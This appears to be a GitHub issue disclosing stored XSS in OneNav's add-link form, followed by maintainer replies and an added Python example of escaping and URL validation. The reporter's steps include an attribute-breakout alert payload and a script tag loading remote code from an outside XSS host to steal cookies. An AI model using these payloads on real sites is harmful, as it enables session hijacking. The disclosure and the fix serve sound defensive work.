OneNav's add link function exists xss vul #26
Comments
Hello, thank you for your feedback. The admin backend currently does no XSS filtering. A normal user would not use their own backend privileges to inject XSS code into their own site, unless the account and password have already been leaked. Still, it counts as a potential risk, and XSS filtering and validation will be added in a later version.

Yes, there is a big problem:

Hi @helloxz,

@nu11secur1ty @OS-WS @alex123-2star Hello everyone, this issue is expected to be fixed in the next version, thanks for your feedback.

Ok, thanks and BR

<3

add link function path




input xss payload 1: "><script>alert("XSS")</script>
click 添加 button
alert xss success
input xss payload 2: <sCRiPt sRC=//xss.pt/NZ9j></sCrIpT>
Get user cookie success
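The fix the maintainer describes for the add-link handler (escaping plus validation), as an added illustration that is not OneNav's own code; it is written in Python for clarity, and the helper names (render_link_unsafe, render_link_safe, is_web_url) and sample inputs are constructed here, modelled on the two payloads in the report.

```python
import html
from urllib.parse import urlsplit

# Constructed sample inputs, modelled on the two payloads in the report above.
PAYLOAD_ATTR_BREAKOUT = '"><script>alert("XSS")</script>'
PAYLOAD_REMOTE_SCRIPT = '<sCRiPt sRC=//xss.pt/NZ9j></sCrIpT>'

# Only absolute web URLs may be stored as a link target; anything else
# (no scheme, protocol-relative, or a non-web scheme) is rejected.
ALLOWED_SCHEMES = {"http", "https"}


def render_link_unsafe(title: str, url: str) -> str:
    """The vulnerable pattern: user-controlled fields pasted straight into HTML.

    A title such as PAYLOAD_ATTR_BREAKOUT closes the title attribute with '">'
    and the rest of the value is rendered as live markup (stored XSS).
    """
    return f'<a href="{url}" title="{title}">{title}</a>'


def is_web_url(url: str) -> bool:
    """Allowlist check for the link target: absolute http(s) URL with a host."""
    parts = urlsplit(url.strip())
    return parts.scheme.lower() in ALLOWED_SCHEMES and bool(parts.netloc)


def render_link_safe(title: str, url: str) -> str:
    """Hardened form: validate the URL, then escape every field for HTML.

    html.escape(..., quote=True) encodes & < > " and ', so a value can no
    longer terminate the attribute or open a new tag.
    """
    if not is_web_url(url):
        raise ValueError("link URL must be an absolute http(s) URL")
    safe_title = html.escape(title, quote=True)
    safe_url = html.escape(url.strip(), quote=True)
    return f'<a href="{safe_url}" title="{safe_title}">{safe_title}</a>'


def contains_live_script(markup: str) -> bool:
    """Demo check: does the rendered HTML still contain an unescaped <script tag?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    for payload in (PAYLOAD_ATTR_BREAKOUT, PAYLOAD_REMOTE_SCRIPT):
        print("unsafe:", render_link_unsafe(payload, "https://example.com/"))
        print("safe:  ", render_link_safe(payload, "https://example.com/"))
```

The same rule applies to every field the add-link form stores (title, URL, description): escape on output for the HTML context it lands in, and validate the URL scheme on input.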